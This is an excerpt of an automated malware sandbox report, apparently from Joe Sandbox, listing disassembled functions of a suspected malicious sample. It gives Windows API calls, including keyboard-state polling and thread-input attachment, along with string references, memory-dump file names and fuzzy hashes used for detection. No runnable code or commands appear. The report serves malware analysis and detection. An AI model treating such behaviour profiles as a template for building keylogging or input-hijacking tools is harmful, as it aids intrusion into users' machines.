DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00A84B3C

Strings

static, xrefs: 00A84A71

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 2a36c4ab1edd34b62ab0029ebc3febb3cb665bf72fa8302cc26b224f7aaa0576
Instruction ID: 7f944fda547716442bf262229cac2bddc126646e5c78bd77840c736f0bfdd1b6
Opcode Fuzzy Hash: 2a36c4ab1edd34b62ab0029ebc3febb3cb665bf72fa8302cc26b224f7aaa0576
Instruction Fuzzy Hash: 77316A3210021ABBDF12AFA4DC08FDA7BA9FF0D764F110211FA25A61E0C735D861DBA4

Function 00A7468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A746B9
CoInitialize.OLE32(00000000), ref: 00A746E7
CoUninitialize.OLE32 ref: 00A746F1
_wcslen.LIBCMT ref: 00A7478A
GetRunningObjectTable.OLE32(00000000,?), ref: 00A7480E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00A74932
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00A7496B
CoGetObject.OLE32(?,00000000,00A90B64,?), ref: 00A7498A
SetErrorMode.KERNEL32(00000000), ref: 00A7499D
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A74A21
VariantClear.OLEAUT32(?), ref: 00A74A35

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 1ffb762739d0f549e193d4ba8a161658f5a7de91dde3f78e9ec07b976688c7f9
Instruction ID: 6cb1d15d45f9f614de932a4a30004c12ace1e3fbd70553b8c84e1b73c0858cad
Opcode Fuzzy Hash: 1ffb762739d0f549e193d4ba8a161658f5a7de91dde3f78e9ec07b976688c7f9
Instruction Fuzzy Hash: 8DC13671604305AFD700DF68C88492BBBE9FF89748F14891DF9899B261DB31ED46CB52

Function 00A684DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00A68538
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A685D4
SHGetDesktopFolder.SHELL32(?), ref: 00A685E8
CoCreateInstance.OLE32(00A90CD4,00000000,00000001,00AB7E8C,?), ref: 00A68634
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A686B9
CoTaskMemFree.OLE32(?,?), ref: 00A68711
SHBrowseForFolderW.SHELL32(?), ref: 00A6879C
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A687BF
CoTaskMemFree.OLE32(00000000), ref: 00A687C6
CoTaskMemFree.OLE32(00000000), ref: 00A6881B
CoUninitialize.OLE32 ref: 00A68821

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 8dda048d30047047b0695e13c92a5099a0a267c0e7f33463e1f96ca3549d72ca
Instruction ID: fcea01711623a4e5e6162cb98185a52b26fcd6ba5af1de4530e377bbd6ece89d
Opcode Fuzzy Hash: 8dda048d30047047b0695e13c92a5099a0a267c0e7f33463e1f96ca3549d72ca
Instruction Fuzzy Hash: 29C12C75A00109AFCB14DFA4C888DAEBBF9FF48344B148598F51AEB261DB34ED45CB90

Function 00A50378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00A5039F
SafeArrayAllocData.OLEAUT32(?), ref: 00A503F8
VariantInit.OLEAUT32(?), ref: 00A5040A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00A5042A
VariantCopy.OLEAUT32(?,?), ref: 00A5047D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00A50491
VariantClear.OLEAUT32(?), ref: 00A504A6
SafeArrayDestroyData.OLEAUT32(?), ref: 00A504B3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A504BC
VariantClear.OLEAUT32(?), ref: 00A504CE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A504D9

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 217f246699783e19aaeb2f7e6fa4cad0ea802d5dcce14a7426a9e93c958bd8a2
Instruction ID: a94836914be874f94eca4692d4169958df0ca7570209433c9187e9ee24be304f
Opcode Fuzzy Hash: 217f246699783e19aaeb2f7e6fa4cad0ea802d5dcce14a7426a9e93c958bd8a2
Instruction Fuzzy Hash: 9B415275A00219EFCF10DFA4D844DEE7BB9FF48355F008469E955A7261CB34A946CF90

Function 00A5A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00A5A65D
GetAsyncKeyState.USER32(000000A0), ref: 00A5A6DE
GetKeyState.USER32(000000A0), ref: 00A5A6F9
GetAsyncKeyState.USER32(000000A1), ref: 00A5A713
GetKeyState.USER32(000000A1), ref: 00A5A728
GetAsyncKeyState.USER32(00000011), ref: 00A5A740
GetKeyState.USER32(00000011), ref: 00A5A752
GetAsyncKeyState.USER32(00000012), ref: 00A5A76A
GetKeyState.USER32(00000012), ref: 00A5A77C
GetAsyncKeyState.USER32(0000005B), ref: 00A5A794
GetKeyState.USER32(0000005B), ref: 00A5A7A6

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: a648d78b1272dd03210095e1b6c26a95c12c1a2db194993515ae2d8f5fb8f31e
Instruction ID: d7141d5d5de94bb82bb983ba4939b6c028b0abf1a224618d1130678607d16e61
Opcode Fuzzy Hash: a648d78b1272dd03210095e1b6c26a95c12c1a2db194993515ae2d8f5fb8f31e
Instruction Fuzzy Hash: 3341B2747047CA6DFF31976088047A5BEB07B35315F08825ADDC69A5C2EBB499CC8BA3

Function 00A79730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00A79750

Part of subcall function 00A59805: _wcslen.LIBCMT ref: 00A59828

_wcslen.LIBCMT ref: 00A797AB
_wcslen.LIBCMT ref: 00A797F9
_wcslen.LIBCMT ref: 00A79839
_wcslen.LIBCMT ref: 00A798CB

Strings

stdcall, xrefs: 00A79833, 00A79838
winapi, xrefs: 00A797F3, 00A797F8
none, xrefs: 00A798C2, 00A798C7
cdecl, xrefs: 00A797A5, 00A797AA

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 4226128b047d1ab302b9c29b93dfa91724a08a3a63bf04d319e54fe99bab4c75
Instruction ID: a43cbda908f389789300c022f330ed35df75c628f7a42346d44f22b6149eee09
Opcode Fuzzy Hash: 4226128b047d1ab302b9c29b93dfa91724a08a3a63bf04d319e54fe99bab4c75
Instruction Fuzzy Hash: 3351B132A005169BCB14DFACCD519BEB3A5BF65360B20C22AE92AE7290DB31DD40C791

Function 00A74189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00A741D1
CoUninitialize.OLE32 ref: 00A741DC
CoCreateInstance.OLE32(?,00000000,00000017,00A90B44,?), ref: 00A74236
IIDFromString.OLE32(?,?), ref: 00A742A9
VariantInit.OLEAUT32(?), ref: 00A74341
VariantClear.OLEAUT32(?), ref: 00A74393

Strings

Invalid parameter, xrefs: 00A742C2
Failed to create object, xrefs: 00A74241, 00A742F7
NULL Pointer assignment, xrefs: 00A7427B

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 49aa4b535e6ee9a94e467cabfe8f69f8208584687dc18e692c4b1c8b10ae65c5
Instruction ID: dd3be94abb970a0b35c8aefcb0273768623f5bd69fdb7b49b792003df4801478
Opcode Fuzzy Hash: 49aa4b535e6ee9a94e467cabfe8f69f8208584687dc18e692c4b1c8b10ae65c5
Instruction Fuzzy Hash: AC619171608701EFD310DF64DD88FAABBE8AF49714F108909F5899B292D770ED48CB92

Function 00A68BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00A68C9C
SystemTimeToFileTime.KERNEL32(?,?), ref: 00A68CAC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A68CB8
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A68D55
SetCurrentDirectoryW.KERNEL32(?), ref: 00A68D69
SetCurrentDirectoryW.KERNEL32(?), ref: 00A68D9B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A68DD1
SetCurrentDirectoryW.KERNEL32(?), ref: 00A68DDA

Strings

*.*, xrefs: 00A68DE0

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 0065082394e62b1cc177813b03f820e0629046942b6be88802fcc3c575b77f4a
Instruction ID: 292b4c425d34bcac38b38a6bee34abcceb9960056631153b1d3bda2d1fe84cfa
Opcode Fuzzy Hash: 0065082394e62b1cc177813b03f820e0629046942b6be88802fcc3c575b77f4a
Instruction Fuzzy Hash: 8B6138B25043099FCB10EF60C944AAEB3FCFF99320F044919E999D7291DB35E945CBA2

Function 00A8955E Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009F24B0

Part of subcall function 009F19CD: GetCursorPos.USER32(?), ref: 009F19E1
Part of subcall function 009F19CD: ScreenToClient.USER32(00000000,?), ref: 009F19FE
Part of subcall function 009F19CD: GetAsyncKeyState.USER32(00000001), ref: 009F1A23
Part of subcall function 009F19CD: GetAsyncKeyState.USER32(00000002), ref: 009F1A3D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00A895C7
ImageList_EndDrag.COMCTL32 ref: 00A895CD
ReleaseCapture.USER32 ref: 00A895D3
SetWindowTextW.USER32(?,00000000), ref: 00A8966E
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00A89681
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00A8975B

Strings

p6, xrefs: 00A896CD
@GUI_DRAGFILE, xrefs: 00A896F6
@GUI_DROPID, xrefs: 00A896AD

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$p6
API String ID: 1924731296-1088361730
Opcode ID: 0417586c239964b421f0de349a7fd1fb852ed5f62ebf8cb90b879aa60863bc10
Instruction ID: 2a0eff51222a8e93bc101fbed686d3392c440ab4e0c30f88dc31af3bc469f9da
Opcode Fuzzy Hash: 0417586c239964b421f0de349a7fd1fb852ed5f62ebf8cb90b879aa60863bc10
Instruction Fuzzy Hash: 63516871604304AFD704EF24CC56FBA77E8FB88714F400A2DFA96962E2DB719909CB52

Function 00A846E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00A84715
SetMenu.USER32(?,00000000), ref: 00A84724
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A847AC
IsMenu.USER32(?), ref: 00A847C0
CreatePopupMenu.USER32 ref: 00A847CA
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A847F7
DrawMenuBar.USER32 ref: 00A847FF

Strings

F, xrefs: 00A847EA
0, xrefs: 00A846F0

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 671a02e041712e2517af8f6dd79ff557290f4b816a2b961c5f7933858543d59f
Instruction ID: dce56c01c3e7e9aa6bbf9ded3fc0e9e920da35146810ddfbc5b2682f21a68baf
Opcode Fuzzy Hash: 671a02e041712e2517af8f6dd79ff557290f4b816a2b961c5f7933858543d59f
Instruction Fuzzy Hash: 44415775A0120AEFDF28EFA4D884FAA7BB5FF49314F144029FA45A73A0D770A915CB50

Function 00A5282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009FB329: _wcslen.LIBCMT ref: 009FB333

Part of subcall function 00A545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A54620

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00A528B1
GetDlgCtrlID.USER32 ref: 00A528BC
GetParent.USER32 ref: 00A528D8
SendMessageW.USER32(00000000,?,00000111,?), ref: 00A528DB
GetDlgCtrlID.USER32(?), ref: 00A528E4
GetParent.USER32(?), ref: 00A528F8
SendMessageW.USER32(00000000,?,00000111,?), ref: 00A528FB

Strings

ComboBox, xrefs: 00A52839
ListBox, xrefs: 00A5286E

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: dee8d09147779c121acf103be6ed49ae8de39e6812dab0d7308fe0466766380a
Instruction ID: a21bd3a9c7d053da835747b989e84ae1304da280ea61d362a81b8b8287a0a34e
Opcode Fuzzy Hash: dee8d09147779c121acf103be6ed49ae8de39e6812dab0d7308fe0466766380a
Instruction Fuzzy Hash: 59218EB5900118BBCF05EFA0CC85EEEBBB8FF0A350F004156B961A72E1DB795819DB60

Function 00A5290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009FB329: _wcslen.LIBCMT ref: 009FB333

Part of subcall function 00A545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A54620

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00A52990
GetDlgCtrlID.USER32 ref: 00A5299B
GetParent.USER32 ref: 00A529B7
SendMessageW.USER32(00000000,?,00000111,?), ref: 00A529BA
GetDlgCtrlID.USER32(?), ref: 00A529C3
GetParent.USER32(?), ref: 00A529D7
SendMessageW.USER32(00000000,?,00000111,?), ref: 00A529DA

Strings

ComboBox, xrefs: 00A5291A
ListBox, xrefs: 00A5294F

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: a78e3f512ec3ddeb1a1d402df5d007ffb91d76e0e5d70dc103a24dc8a8d15d4c
Instruction ID: edde49a28853bfbd2ac510548b7e230858dad5870521e805b6099ef3a31f46ca
Opcode Fuzzy Hash: a78e3f512ec3ddeb1a1d402df5d007ffb91d76e0e5d70dc103a24dc8a8d15d4c
Instruction Fuzzy Hash: 62219DB5940118BBDF11EFA0CC85EFEBBB8FF09350F004016B951A72A1DB798859DB60

Function 00A844BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A84539
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A8453C
GetWindowLongW.USER32(?,000000F0), ref: 00A84563
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A84586
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A845FE
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00A84648
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00A84663
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00A8467E
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00A84692
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00A846AF

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 2cf8ccbcf7c6ed563da3cb932e50dfb194f09bbc859ec58093a2165dc7ee9e16
Instruction ID: 6f2da03f3a9104cd620acfd5f77364bbce77dea7947abaf82417de8f6bf5be7d
Opcode Fuzzy Hash: 2cf8ccbcf7c6ed563da3cb932e50dfb194f09bbc859ec58093a2165dc7ee9e16
Instruction Fuzzy Hash: 7F616975A00209AFDB10EFA4CD81FEE77B8EF09710F10416AFA14A72A1D7B4A946DB50

Function 00A5BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00A5BB18
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00A5ABA8,?,00000001), ref: 00A5BB2C
GetWindowThreadProcessId.USER32(00000000), ref: 00A5BB33
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A5ABA8,?,00000001), ref: 00A5BB42
GetWindowThreadProcessId.USER32(?,00000000), ref: 00A5BB54
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00A5ABA8,?,00000001), ref: 00A5BB6D
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A5ABA8,?,00000001), ref: 00A5BB7F
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00A5ABA8,?,00000001), ref: 00A5BBC4
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00A5ABA8,?,00000001), ref: 00A5BBD9
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00A5ABA8,?,00000001), ref: 00A5BBE4

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 0b90d6b7960b9188b3e48b8e9458a3ac680bb10faa77b0b50c6ee4f978c530a4
Instruction ID: aac5f31e714f6061f23305f64d2f241710b09833b055fad53c47990eb7a39eb4
Opcode Fuzzy Hash: 0b90d6b7960b9188b3e48b8e9458a3ac680bb10faa77b0b50c6ee4f978c530a4
Instruction Fuzzy Hash: 34318DB2924208AFDB20DBA4EC98F6977B9FB48313F124015FE05D71E4D7B899458B34

Function 00A22FF3 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00A23007

Part of subcall function 00A22D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A2DB51,00AC1DC4,00000000,00AC1DC4,00000000,?,00A2DB78,00AC1DC4,00000007,00AC1DC4,?,00A2DF75,00AC1DC4), ref: 00A22D4E
Part of subcall function 00A22D38: GetLastError.KERNEL32(00AC1DC4,?,00A2DB51,00AC1DC4,00000000,00AC1DC4,00000000,?,00A2DB78,00AC1DC4,00000007,00AC1DC4,?,00A2DF75,00AC1DC4,00AC1DC4), ref: 00A22D60

_free.LIBCMT ref: 00A23013
_free.LIBCMT ref: 00A2301E
_free.LIBCMT ref: 00A23029
_free.LIBCMT ref: 00A23034
_free.LIBCMT ref: 00A2303F
_free.LIBCMT ref: 00A2304A
